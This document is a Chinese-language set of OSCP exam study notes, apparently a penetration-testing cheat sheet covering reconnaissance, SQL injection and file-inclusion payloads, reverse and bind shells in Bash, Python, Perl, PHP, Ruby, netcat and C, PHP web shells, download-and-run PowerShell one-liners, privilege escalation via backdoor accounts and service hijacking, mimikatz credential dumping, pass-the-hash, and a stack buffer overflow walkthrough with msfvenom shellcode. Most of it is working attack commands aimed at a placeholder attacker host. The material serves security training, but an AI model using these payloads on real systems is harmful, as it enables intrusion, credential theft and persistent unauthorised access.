OSCP学习笔记
一、侦查与枚举
1、渗透日志记录
script target.log
2、端口扫描
(1)Nmap
nmap -sS -Pn -n -A x.x.x.x
不重试扫描所有udp端口
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
(2)Nc
nc -nvv -w 1 -z x.x.x.x 1-100
(3)PowerShell
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
3、主机枚举
(1)nikto -h x.x.x.x
(2)enum4linux x.x.x.x
(3)探测主机是32位还是64位
链接:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
python getArch.py -target x.x.x.x
4、DNS域名解析
dig axfr domain.com @nameserver
5、Web目录模糊查询
(1)Gobuster
apt-get install seclists
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
(2)Wfuzz
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
6、SMB枚举
smbmap -H x.x.x.x
smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
smbmount //x.x.x.x/share /mnt –o username=xxx,workgroup=xxx
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=xxx,password=xxx //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share
使用rpcclient的匿名
rpcclient -U "" x.x.x.x
7、SNMP枚举
snmpwalk -c public -v1 x.x.x.x
使用默认字符串进行扫描,通过对Kerberos服务强制查询可能的用户名来发现有效用户名
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
8、CMS
(1)cmsmap
cmsmap.py https://x.x.x.x
(2)wpscan
wpscan --url https://x.x.x.x
暴力登录
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
9、SQL注入
(1)常用方法
1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
(2)使用时间延迟查找可注入参数
';WAITFOR DELAY '0:0:5'--
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
(3)如果上述方法生效,尝试使用xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
(4)xp_cmdshell测试ping
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
(5)xp_cmdshell添加admin
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD'; --
(6)xp_cmdshell添加admin到RDP组
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD && net localgroup "Remote Desktop Users" xxx /ADD'; --
10、本地文件包含漏洞(LFI)
(1)基本检查
linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
?
../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
(2)LFI利用
(1)expect://
http://x.x.x.x/blah?parameter=expect://whoami
(2)data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
(3)input://
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
11、远程文件包含漏洞(RFI)
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
12、文件与文件系统
查看静态系统文件
cat /etc/fstab
查找可写目录
查找可写文件
?
查找可写配置文件
find /etc/ -writable -type f 2>/dev/null
二、Get Shell
1、Shells
(1)ReverseShells
Bash
bash -i >& /dev/tcp/x.x.x.x/4444?0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
/bin/sh -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PHP
php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh x.x.x.x 4444
nc -e cmd.exe x.x.x.x 4444
/bin/sh | nc x.x.x.x 4444
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 4444 0/tmp/p
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Shellshock reverse shell
验证user-agent header中的漏洞
() { :; }; /bin/bash -c 'whoami'
反弹shell
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1;'
PowerShell
Invoke-PowerShellTcp
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
在最下面加
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 4444
C
// gcc reverse.c -o reverse
?
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
?
int main (int argc, char **argv)
{
? int scktd;
? struct sockaddr_in client;
?
? client.sin_family = AF_INET;
? client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
? client.sin_port = htons(4444); // attacker port
?
? scktd = socket(AF_INET,SOCK_STREAM,0);
? connect(scktd,(struct sockaddr *)&client,sizeof(client));
?
? dup2(scktd,0); // STDIN
? dup2(scktd,1); // STDOUT
? dup2(scktd,2); // STDERR
?
? execl("/bin/sh","sh","-i",NULL,NULL);
?
? return 0;
}
(2)Bind shells
C
// gcc bind.c -o bind
?
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
?
int main (int argc, char **argv)
{
? int scktd = -1;
? int scktd_client = -1;
? int i = -1;
? struct sockaddr_in server;
? struct sockaddr_in client;
??
? scktd = socket(AF_INET,SOCK_STREAM,0);
? if (scktd == -1)
? ? return -1;
?
? server.sin_family = AF_INET;
? server.sin_addr.s_addr = INADDR_ANY;
? server.sin_port = htons(4444); // local listening port
?
? if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
? ? return -2;
?
? listen(scktd,3);
? i = sizeof(struct sockaddr_in);
? scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
? if (scktd_client < 0)
? ? return -3;
?
? dup2(scktd_client,0); // STDIN
? dup2(scktd_client,1); // STDOUT
? dup2(scktd_client,2); // STDERR
?
? execl("/bin/sh","sh","-i",NULL,NULL);
?
? return 0;
}
(3)WebShells
PHP
<1> wordpress
wordpress找到404界面
http://x.x.x.x/404.php?cmd=id
http://x.x.x.x/404.php?cmd=nc x.x.x.x 4444 -e /bin/sh
代码
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<2> phpMyAdmin
<?php system("/usr/local/bin/wget http://x.x.x.x:4444/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>
<3> SQL查询
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"
LFI反弹shell
http://x.x.x.x/blah?parameter=/etc/passwd%00
<1> POST request URL
http://x.x.x.x/blah?parameter=php://input%00
<2> POST data
<? phpinfo(); ?>
<3> POST data?通过443端口反弹
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>
HTTP 方法
<1> HTTP POST
curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"
<2> HTTP PUT
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php
(4)LOCAL
int main(void){
? ? ?setresuid(0, 0, 0);
? ? ?system("/bin/bash");
?}
2、文件传输
python文件传输
python -m SimpleHTTPServer (默认端口8000)
python -m SimpleHTTPServer 8001
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py
(1)Windows
<1> PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:4444/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')
远程代码下载
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
<2> FTP
方法一:
配置kali ftp
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
开启kali ftp server
# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start
在目标主机下载nc
echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt
方法二
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
ftp x.x.x.x
get nc.exe
nc.exe -nv x.x.x.x 4444 -e cmd.exe?
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 4444
<3> rdp
通过本地共享
rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare
<4> VBScript
代码
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
执行
cscript wget.vbs http://x.x.x.x/file.exe file.exe
(2)Linux
<1> Wget
wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt
<2> Netcat
目标机
nc -lvp 4444 > blah.txt
本机
方法一
nc x.x.x.x 4444 < blah.txt
方法二
cat blah.txt | nc x.x.x.x 4444
<3> Python
python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py
三、提权
1、Windows
(1)Windows 版本
<1> 客户端
?<2> 服务端
(2)Users?
查看当前用户
whoami
echo %username%
我们有哪些用户权限
whoami /priv
用户有哪些
net users
看是否有管理员权限
net localgroup administrators
凭证管理
cmdkey /list
当前缓存的Kerberos票证(可能还有其他网络组件的一些信息)
klist
是否有其他已登录用户
qwinsta
(3)Password
password hashes
/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
fgdump链接
如果是域控制,请在groups.xml中搜索“cpassword”:
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
(4)查找密码
dir /s *password*
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
一些常见的文件
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
?
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
(5)始终保持高位
检查一下注册表值是否为1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果是1,则执行恶意msi添加本地用户
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msiexec /quiet /qn /i C:\hodor.msi
(6)upnp
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
缺少依赖项时出错?
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
或者直接移除依赖
sc config upnphost depend= ""
(7)计划任务
列出计划任务
schtasks /query /fo LIST /v
运行链接到服务的进程
tasklist /SVC
(8)PowerShell 工具
<1> PowerUp.ps1
检查公共窗口载体
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools · GitHub
在目标机下载
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
在脚本底部增加
Invoke-AllChecks
运行
powershell.exe -nop -exec bypass
PS C:\> ?Import-Module .\PowerUp.ps1
PS C:\> ?Invoke-AllChecks
<2> Sherlock.ps1
Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock · GitHub
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
在脚本底部增加
Find-AllVulns
运行
powershell.exe -nop -exec bypass
PS C:\> ?Import-Module .\Sherlock.ps1
PS C:\> ?Find-AllVulns
<3> Nishang
(9)编译
在linux上编译exe
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
编译python脚本为可执行文件
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
(10)windows漏洞
<1> 远程漏洞
ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050
<2> 本地漏洞
ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032
链接:
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
https://github.com/SecWiki/windows-kernel-exploits
2、Linux
(1)Sudo
cat /etc/sudoers
sudo -l
成为超级英雄:
root可以从所有终端执行,充当所有(任何)用户,并运行所有(任何)命令。
root ALL=(ALL) ALL
用户john可以从任何终端使用john的用户密码运行命令power off
john ALL= /sbin/poweroff
用户john可以从任何终端以root用户身份运行命令scp,无需密码。
john ALL = (root) NOPASSWD: /usr/bin/scp
(2)分发类型和内核版本
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
(3)默认可写目录/文件夹
/tmp
/dev/shm
(4)查找密码
在config.php中搜索密码
grep -R 'password' config.php
在整个系统里面查询密码
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
(5)查找可能的其他可写目录/文件夹
?
(6)root正在运行的服务
ps aux | grep root
ps -ef | grep root
(7)已安装app
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/
(8)计划工作
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
(9)其他方法
<1> 在文件中查找
grep -rnw '/etc/passwd' -e 'root'
<2> SSH
authorized_keys:
包含任何授权客户端的公钥签名,换句话说,指定可用于登录到为其配置文件的用户帐户的SSH密钥。此文件允许服务器对用户进行身份验证。
id_rsa
包含客户端的私钥。此RSA密钥可与SSH协议1或2一起使用。
id_rsa.pub
包含客户端的公钥
id_dsa
包含客户端的私钥。此(不安全)DSA密钥只能与SSH协议2一起使用。
id_dsa.pub
包含客户端的公钥
known_hosts
包含客户端曾经连接到的主机的主机签名列表。
<3> 查找RSA私钥
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
? ? if [ -s "${X}/.ssh/id_rsa" ]; then
? ? ? ? echo "### ${X}: "
? ? ? ? cat "${X}/.ssh/id_rsa"
? ? ? ? echo ""
? ? fi
done
<4> 查找DSA私钥
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
? ? if [ -s "${X}/.ssh/id_dsa" ]; then
? ? ? ? echo "### ${X}: "
? ? ? ? cat "${X}/.ssh/id_dsa"
? ? ? ? echo ""
? ? fi
done
<5> 查找bit, SGID, SUID, GUID
bit :
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000) :
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
(10)向/etc/passwd增加用户,所属组为root
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
(11)枚举工具
Linenum.sh
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
LinPrivChecker.py?
linpostexp/linprivchecker.py at master · reider-roque/linpostexp · GitHub
(12)Linux本地漏洞
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
(13)预编译漏洞
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/xairy/linux-kernel-exploitation
四、后渗透
1、Proof.txt
(1)Linux
cat /root/proof.txt
(2)Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
2、Windows
(1)增加RDP用户
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
(2)启用RDP
通过注册表
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
添加防火墙策略
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
(3)RDP连接
rdesktop -g 1024x768 x.x.x.x
(4)密码与哈希
从lsass内存中提取密码、密钥、pin码、票据
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam
Windows凭据编辑器(WCE):
安全工具,可用于从Windows主机中提取明文密码和NTLM散列。需要管理员权限
Amplia Security - Research - Windows Credentials Editor (WCE)
C:\> wce -w
(5)网络
查看网络连接
netstat -ano
Host文件
C:\WINDOWS\System32\drivers\etc\hosts
防火墙配置文件
netsh firewall show state
netsh firewall show config
netsh dump
(6)PowerShell 工具
Empire
https://github.com/EmpireProject/Empire
PowerSploit
https://github.com/PowerShellMafia/PowerSploit
2、Linux
切换TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'
五、横向移动
1、本地端口转发
本地端口转发到远程端口
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
2、远程端口转发
转发远程端口到本地端口
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Windows:转发本地445端口到kali444端口
首先在kali上启动ssh
service ssh start
下载plink.exe然后执行
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445
3、动态端口转发
-D 使SSH充当SOCKS(4,5)代理服务器,这只是一个SSH隧道,在该隧道中,特定应用程序通过隧道将流量转发到远程服务器。与本地端口转发不同,动态端口转发可以处理来自多个端口的连接。
ssh -D <local proxy port> -p <remote port> <target>
六、缓冲区溢出
1、基础知识
x86体系结构包含8个通用寄存器,用于存储数据,然后可以将该点寻址到内存中的其他位置
EBP(基础指针)
ESP(堆栈指针)
EAX(累加器)
EBX(基底器)
ECX(计数器)
EDX(数据)
EDI(目标地址)
ESI(源地址)
EIP:扩展指令指针。这是一个只读寄存器,包含下一条要执行的指令的地址(告诉CPU下一步要做什么)
ESP:扩展堆栈指针。指向位于较低内存位置的堆栈顶部(随时)
EBP:扩展的基本堆栈指针。指向堆栈底部的更高地址(最后一项)
2、坏字符
0x00 ? ? NULL (\0)
0x09 ? ? Tab (\t)
0x0a ? ? Line Feed (\n)
0x0d ? ? Carriage Return (\r)
0xff? ? ? ?Form Feed (\f)
bash中生成坏字符列表
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
python中生成坏字符列表
'\\'.join([ "x{:02x}".format(i) for i in range(1,256) ])
3、Windows
常规步骤
(1)模糊直至崩溃,注意EIP被A's (x41)覆盖。
(2)使用pattern_create.rb生成唯一字符串并将其发送到目标
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
(3)识别覆盖EIP的4个字节(以十六进制表示)
(4)使用pattern_offset.rb计算这些特定4字节的偏移量
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
(5)发送新的缓冲区字符串以检查我们是否可以控制EIP寄存器,因为它应该用B's写。添加到漏洞并注意ESP和EIP寄存器的结果
buffer = "A" * 2606 + "B" * 4 + "C" * 90
(6)检查缓冲区内是否有更多可用空间(将缓冲区长度从2700字节增加到3500字节,并查看这是否会导致代码的缓冲区空间更大)。启动morespace.py->右键单击ESP->跟踪转储。添加到漏洞并检查C's
buffer = "A" * 2606 + "B" * 4 + "C" * (3500 – 2606 - 4)
(7)检查坏字符(0x00到0xff)。将所有这些字符粘贴到缓冲区中,并检查ESP寄存器转储被截断的位置。右键单击ESP并在转储中跟随以查看
(8)如果我们不能直接跳转到我们的缓冲区,我们需要在内存中找到一个可靠的地址,其中包含一条指令,如JMP ESP。我们可以跳转到它,然后在跳转时,跳转到ESP寄存器指向的地址。这将是一种可靠的间接方式来访问ESP寄存器指示的内存。mona.py可以帮助识别内存中可以搜索返回地址的模块(不应存在DEP和ASLR,并且高内存范围不包含坏字符)
!mona modules
检查是否受任何内存保护方案(Rebase、SafeSEH、ASLR、NXCompat)的影响,并注意特定的DLL(右栏)。
(9)?JMP ESP equivalent = opcode
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 ?FFE4 ? ? ? ? ? ? ?jmp esp
结果为"\xff\xe4"
(10)使用mona在步骤8中找到的DLL中查找JMP ESP内存地址。使用一个不包含任何坏字符的。
!mona find -s "\xff\xe4" -m <dllname>.dll
(11)暂停调试器并按照地址(指向右侧的黑色箭头:“要遵循的表达式”)。注意是否找到JMP ESP(左上方的窗格)
(12)设置一个断点来检查我们是否可以到达JMP ESP。
左上窗格->右键单击->转到表达式
左上窗格->右键单击->断点->切换(F2)
使用并执行以下操作
添加到PoC(内存地址是我们在步骤10中找到的地址,注意Little Endian)
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
运行PoC并检查是否命中了断点(调试器底部的消息)。
(13)生成反弹shell
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
(14)添加shellcode到脚本
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
如果需要可以增加NOP
案例
FuzzySecurity | ExploitDev: Part 2
Exploiting Simple Buffer Overflows on Win32
GitHub - justinsteven/dostackbufferoverflowgood
buffer-overflow/win-buff-overflow at master · SiowCY/buffer-overflow · GitHub
七、其他
1、kali自带反弹shell
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/webshells/php/simple-backdoor.php
2、Msfvenom
(1)查看所有payload
msfvenom -l payloads
(2)监听
msfconsole
use exploit/multi/handler
set lhost x.x.x.x
set lport 4444
exploit
(3)Windows
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 EXITFUNC=thread -b "\x00" -f python -v shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > shell.asp
(4)Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > shell.jsp
3、Linux小技巧
(1)vi
移除文件前5个字符
:%s/^.\{5}//
